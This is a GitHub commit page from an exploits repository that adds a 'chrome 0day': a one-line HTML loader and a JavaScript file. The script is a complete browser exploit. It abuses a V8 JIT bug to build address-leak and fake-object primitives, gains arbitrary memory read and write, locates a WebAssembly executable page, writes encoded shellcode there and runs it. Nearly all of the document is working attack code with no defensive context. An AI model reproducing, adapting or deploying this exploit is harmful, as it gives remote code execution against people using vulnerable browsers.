https://github.com/r4j0x00/exploits/commit/7ba55e5ab034d05877498e83f144e187d3ddb160 r4j0x00 / exploits Add chrome 0day @r4j0x00 r4j0x00 committed Apr 12, 2021 1 parent cbe5ead commit 7ba55e5ab034d05877498e83f144e187d3ddb160 Showing 2 changed files with 99 additions and 0 deletions. 1. +1 -0 chrome-0day/exploit.html 2. +98 -0 chrome-0day/exploit.js 1 chrome-0day/exploit.html @@ -0,0 +1 @@ 98 chrome-0day/exploit.js 
@@ -0,0 +1,98 @@ var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128, 128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112, 0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128 ,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128, 128,128,0,1,132,128,128,128,0,0,65,42,11]) var wasm_mod = new WebAssembly.Module(wasm_code); var wasm_instance = new WebAssembly.Instance(wasm_mod); var f = wasm_instance.exports.main; var buf = new ArrayBuffer(8); var f64_buf = new Float64Array(buf); var u64_buf = new Uint32Array(buf); let buf2 = new ArrayBuffer(0x150); function ftoi(val) { f64_buf[0] = val; return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); } function itof(val) { u64_buf[0] = Number(val & 0xffffffffn); u64_buf[1] = Number(val >> 32n); return f64_buf[0]; } const _arr = new Uint32Array([2**31]); function foo(a) { var x = 1; x = (_arr[0] ^ 0) + 1; x = Math.abs(x); x -= 2147483647; x = Math.max(x, 0); x -= 1; if(x==-1) x = 0; var arr = new Array(x); arr.shift(); var cor = [1.1, 1.2, 1.3]; return [arr, cor]; } for(var i=0;i<0x3000;++i) foo(true); var x = foo(false); var arr = x[0]; var cor = x[1]; const idx = 6; arr[idx+10] = 0x4242; function addrof(k) { arr[idx+1] = k; return ftoi(cor[0]) & 0xffffffffn; } function fakeobj(k) { cor[0] = itof(k); return arr[idx+1]; } var float_array_map = ftoi(cor[3]); var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]; var fake = fakeobj(addrof(arr2) + 0x20n); function arbread(addr) { if (addr % 2n == 0) { addr += 1n; } arr2[1] = itof((2n << 32n) + addr - 8n); return (fake[0]); } function arbwrite(addr, val) { if (addr % 2n == 0) { addr += 1n; } arr2[1] = itof((2n << 32n) + addr - 8n); fake[0] = itof(BigInt(val)); } function copy_shellcode(addr, shellcode) { let dataview = new DataView(buf2); let buf_addr = addrof(buf2); let backing_store_addr = buf_addr + 0x14n; arbwrite(backing_store_addr, addr); for (let i = 0; i < shellcode.length; i++) { dataview.setUint32(4*i, 
shellcode[i], true); } } var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16)) ; var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142 ,1384859749,1384859744,1384859672,1921730592,3071232080,827148874, 3224455369,2086747308,1092627458,1091422657,3991060737,1213284690, 2334151307,21511234,2290125776,1207959552,1735704709,1355809096, 1142442123,1226850443,1457770497,1103757128,1216885899,827184641, 3224455369,3384885676,3238084877,4051034168,608961356,3510191368, 1146673269,1227112587,1097256961,1145572491,1226588299,2336346113, 21530628,1096303056,1515806296,1497454657,2202556993,1379999980, 1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257, 2335291969,3590293359,2729832635,2797224278,4288527765,3296938197, 2080783400,3774578698,1203438965,1785688595,2302761216,1674969050, 778267745,6649957]; copy_shellcode(rwx_page_addr, shellcode); f();